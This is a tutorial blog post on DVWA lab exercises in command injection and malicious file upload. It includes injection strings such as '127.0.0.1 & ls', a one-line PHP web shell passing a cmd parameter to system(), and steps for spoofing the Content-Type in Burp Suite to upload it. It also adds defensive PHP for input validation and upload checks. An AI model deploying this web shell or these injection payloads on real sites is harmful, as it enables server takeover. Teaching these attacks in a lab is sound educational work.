Website Hacking Series; Part B: Malicious Code injection & File Upload

Frankline Misango
8 min read · Feb 26, 2023

Cover Image: Anonfile image label (source: මිස්ටර් 001 / Wikimedia commons)

Disclaimer: This article is for educational purposes and promotes ethical hacking and superior cybersecurity practices in organisations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks.

Hello, welcome back to this series. We are exploring website hacking tricks, and today I will demonstrate how we can upload malicious code and files disguised as images; in reality, they are simple malicious scripts [for your understanding]. I highly recommend you begin with Part A, which tackles how to brute-force passwords to gain access to websites.

In this article, I will be covering malicious code injection and file upload attacks. Have you visited websites that ask users to upload their images/answers/PDFs etc. to their database? Well, it’s possible to disguise such files as legitimate ones whilst embedding them with bash scripts that can manipulate the integrity of such websites. I will cover these in two separate parts, but they are often similar.

Unlike the previous article, this article is less technical and has more of a type-and-upload vibe. Any script kiddie can do it (I really don’t know if I am a hacker yet or a mature script kiddie :) btw).

Requirements

  • Kali Linux (separate OS or VMware Kali Linux)
  • Burpsuite (installed by default in Kali)
  • DVWA (download from https://github.com/digininja/DVWA)
  • MySQL (installed by default in Kali)
  • Apache (installed by default in Kali)
  • Basic mastery of MySQL, PHP & Bash scripting.

Procedure I — Malicious code injection

  1. Installing & running DVWA. This video offers the best explanation for getting DVWA up and running and walks through my instructions below on video (if you succeed, jump directly to step 2). I also covered it fully in step 1 of the previous article. Read more here. Make sure you have a window as below. We set our username and password as Admin & password respectively.
Type admin and password to gain access to the window

2. After logging into DVWA, navigate to the command injection page and find the window below, which I am sure you are familiar with. Websites that take typed input often ask for an IP address, for example when a user wants to determine his/her location. The window below mimics that.

3. Scroll down and select View Source to see what the PHP code looks like. We can see that the code requests an IP address and posts it. However, it puts no preventive measure in place to bar us from typing anything that is not an IP address. We would expect code like that in figure 3.2 below, which checks whether the user really entered an IP address.

Figure 3.1 We can see that there is no measure to check whether the input is in the format of an IP address or not; compare that to figure 3.2
Figure 3.2 We can see that there is a robust measure to check that the input is in the form of an IP address, which bars any attempt to inject malicious code

4. Let’s type in our DVWA IP address [ 127.0.0.1 ] and assess the output. You can view more about the ping command here. Basically, ping lets us check whether another device on the same network is reachable. For example, say I have connected my Kali PC and Windows PC to the same Wi-Fi router and I want to see whether the Kali PC can communicate with the Windows PC: I just type ping {IP address of the Windows machine}. The screenshot below confirms that it is indeed possible to communicate with our DVWA from our “pinging website”.

Note the response before proceeding to the next steps

5. Since we noted in step 3 that no preventive measure checks whether the user really typed an IP address, we can type in our DVWA IP address followed by another command. For this case, we can go with 127.0.0.1 & ls, which lists the files in the web app in addition to the expected pinging output. A hacker may want to view which files are in the system’s root and decide which one is easy to exploit. View the screenshot below. For fun, try the IP address with other commands that can alter the output. Try [ 127.0.0.1 & echo "Good morning, Your website is Hacked" ]

After typing 127.0.0.1 & ls: a hacker can exploit this weakness to come up with ideas for suitable attacks to pursue.
We have echoed our custom text. Onto the next challenge :)

6. You are done!! That is basically the main idea behind malicious command injection.
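
A server-side check of the kind step 3 calls for, as an added example that is not DVWA's code or the author's: it accepts only a literal IPv4 address and then runs ping without a shell. The function names parse_ipv4 and ping_host are hypothetical, and a Linux ping binary and PHP 7.4 or later are assumed.

```php
<?php
// Added example, not DVWA's code: accept only a literal IPv4 address, then run
// ping without a shell so "&" can never start a second command.

/** Return the address if $input is exactly one IPv4 address, otherwise null. */
function parse_ipv4(string $input): ?string
{
    $ip = filter_var(trim($input), FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

/** Ping a validated address; returns ['ok' => bool, 'output' => string]. */
function ping_host(string $input): array
{
    $ip = parse_ipv4($input);
    if ($ip === null) {
        return ['ok' => false, 'output' => 'Rejected: not an IPv4 address.'];
    }
    // The array form of proc_open (PHP 7.4+) executes the program directly
    // with these arguments; no shell parses them. Assumes a Linux ping.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(['ping', '-c', '4', $ip], $spec, $pipes);
    if (!is_resource($proc)) {
        return ['ok' => false, 'output' => 'Could not start ping.'];
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return ['ok' => proc_close($proc) === 0, 'output' => $output];
}

// The inputs used in the steps above, plus constructed malformed values.
$samples = [
    '127.0.0.1',
    '127.0.0.1 & ls',
    '127.0.0.1 & echo "Good morning, Your website is Hacked"',
    '999.1.1.1',
    '',
];
foreach ($samples as $sample) {
    $verdict = parse_ipv4($sample) === null ? 'rejected' : 'accepted';
    printf("%-60s %s\n", var_export($sample, true), $verdict);
}
```

Validation and shell-free execution are independent layers: either one alone stops the input from step 5, and together they still hold if one is later weakened.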

Procedure II - Malicious File Upload

  1. Navigate to the File Upload section. You should have a window as below.
Typical file upload window

2. We can see the prompt requires us to upload an image file. We can try uploading both an image file and a non-image file and see what the response is. I will navigate to the folder, hacking_tools, from which I want to upload the files. I first copy an image and name it hack.png (choose any name/png/jpg you want). I then create an empty text file called hack.txt. I then upload each and note the response below. We note hack.png is accepted while hack.txt is denied.

Figure 2.1 creating an empty hack.txt and any other hack.png image for testing
Figure 2.2 We note availability of the two images
Figure 2.3: Testing hack.png upload
Figure 2.4: Results of hack.png. We can see that it is indeed successful
Figure 2.5: Trying to upload hack.txt; we expect a rejection
Figure 2.6: Indeed, the file has been rejected by the system

3. Time to observe the PHP source code and gain a deeper understanding of the algorithm. From the PHP, we note we can only upload a jpeg/png file of fewer than 100,000 bytes. Should the conditions fail, we get the message “Your image was not uploaded”.

We note the upload folder and the characteristics of the image we should upload. Likewise, we note which messages should be output once we are successful

4. The biggest trick we need to pull off is to trick the system into believing that the malicious PHP file we upload is indeed an image file. That is where Burpsuite comes in. Remember that in the previous article we installed FoxyProxy, which sets up a proxy config for Burpsuite. First, we need to set the FoxyProxy Burp configuration ON and Burpsuite ON [we covered how to configure FoxyProxy and set Burpsuite intercept to ON in the previous article].

Turning on FoxyProxy, which sets the proxy config to Burpsuite; Burpsuite intercepts this, i.e. port 8080
Set the Burpsuite configuration to on

5. We need to create a malicious PHP file, shell.php, in the hacking folder, which calls the cmd. I will demonstrate, in step 9, how we can use the cmd to pass in common Linux commands to display the files in the web app directory, the users behind the web app etc. [basic scripts for average readers]. See the figure and code snippet below.

<?php
// Passes the value of the cmd query parameter to the operating system shell
system($_GET['cmd']);
?>

Basic configuration of shell.php. After typing vi shell.php, type the PHP code and finally run more to confirm that it's typed as intended

6. We now need to upload shell.php using the same procedure as in step 2. Note: since we are intercepting with Burpsuite, remember the traffic first passes through it before it’s forwarded to the web server for execution. When we click upload below, the Burpsuite window pops up and we can view some key elements, highlighted in red in the figure below.

The window below opens immediately and we can begin disguising our file
We note the highlighted stuff and then work out whether we can change the Content-Type to image/jpeg to begin the attack

7. We need to change the Content-Type to image/jpeg to trick the system into thinking we are uploading an image file while it is in fact a PHP file as from step 7. The system cannot accept any other file apart from an image. Click Forward in the upper left corner. When we go back to the DVWA page, we should see a successful upload message in the next window. We can then turn OFF Burpsuite Intercept.

We edit to image/jpeg and click forward
After opening the window, we notice that shell.php has been uploaded after being disguised as an image

8. We need to note the success message below the window. We can see the file has been uploaded to “hackable/uploads/shell.php”. We access that file by typing the command below in the search bar, invoking the cmd and giving it a common command called “ls” that lists all the files in the directory. We can see the files listed below !!
127.0.0.1/DVWA/hackable/uploads/shell.php?cmd=ls

We begin the exploitation by a simple ls command that we expect to list all the files
We can see the hack.png we uploaded earlier

9. Voila, we have finally finished the file upload. We can now tinker with the cmd and pass it this command:
127.0.0.1/DVWA/hackable/uploads/shell.php?cmd=echo “Your website has been hacked by Frankline, welcome ”

Final image

Follow up Notes

  1. You can construct basic websites and enable the file upload page function. You can then exercise this scripting tutorial to experience a real-world practicum.
  2. Ramp up your knowledge of these languages: PHP, HTML & bash to understand website dynamics and bash scripting.
  3. Practice! Mastering such complex hacking tricks takes time, absolute commitment and patience to learn. You wanna be a hacker, right? Well, it’s not always what you see in movies... This is what hacking looks like.

Recommendations

  1. Frontend Software Engineers in an organization need to write cohesive, multi-tested code that checks multiple parameters of the uploaded file. This has just been a basic example of poor scripting practice that we newbies could exploit. There are hackers out there who can bypass the most intricate non-security loops far better and even attach meterpreter backdoors/keyloggers to such files and gain remote access to the server. Read my article on how we can spy on remote computers using a backdoor keylogger.
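
The Content-Type edited in step 7 of Procedure II is supplied by the client, so a server-side check has to look at the file itself; the added example below (not DVWA's code or the author's) sniffs the stored bytes, re-encodes the image and picks its own file name. The names classify_upload and store_upload are hypothetical, and the fileinfo and GD extensions are assumed.

```php
<?php
// Added example, not DVWA's code. Assumes the fileinfo and GD extensions.
// The browser-supplied name and Content-Type ($_FILES[...]['name'] and
// ['type']) are never consulted: an intercepting proxy can set them freely.

const MAX_BYTES = 100000;  // size limit noted in step 3 of Procedure II
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

/** Inspect the bytes on disk; return the extension to store under, or null. */
function classify_upload(string $tmpPath): ?string
{
    $size = @filesize($tmpPath);
    if ($size === false || $size === 0 || $size >= MAX_BYTES) {
        return null;
    }
    // Type is sniffed from the content, not taken from the request.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !isset(ALLOWED[$mime])) {
        return null;
    }
    return @getimagesize($tmpPath) === false ? null : ALLOWED[$mime];
}

/** Re-encode an accepted image under a random, server-chosen file name. */
function store_upload(string $tmpPath, string $destDir): ?string
{
    $ext = classify_upload($tmpPath);
    $img = $ext === null ? false : @imagecreatefromstring(file_get_contents($tmpPath));
    if ($img === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;  // extension comes from ALLOWED only
    $dest = rtrim($destDir, '/') . '/' . $name;
    $ok = $ext === 'png' ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    return $ok ? $name : null;
}

// Constructed inputs: a small real PNG and a text file that is not an image.
$dir = sys_get_temp_dir();
$png = tempnam($dir, 'up');
imagepng(imagecreatetruecolor(8, 8), $png);
$fake = tempnam($dir, 'up');
file_put_contents($fake, "<?php echo 'not an image'; ?>");

var_dump(classify_upload($png));
var_dump(classify_upload($fake));
unlink($png);
unlink($fake);
```

Serving the upload directory with PHP execution disabled adds a second layer in case a check is ever bypassed.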

Thanks for reading. Be an ethical hacker out there :)

Feel free to contact me for Software Engineering Projects / Internship here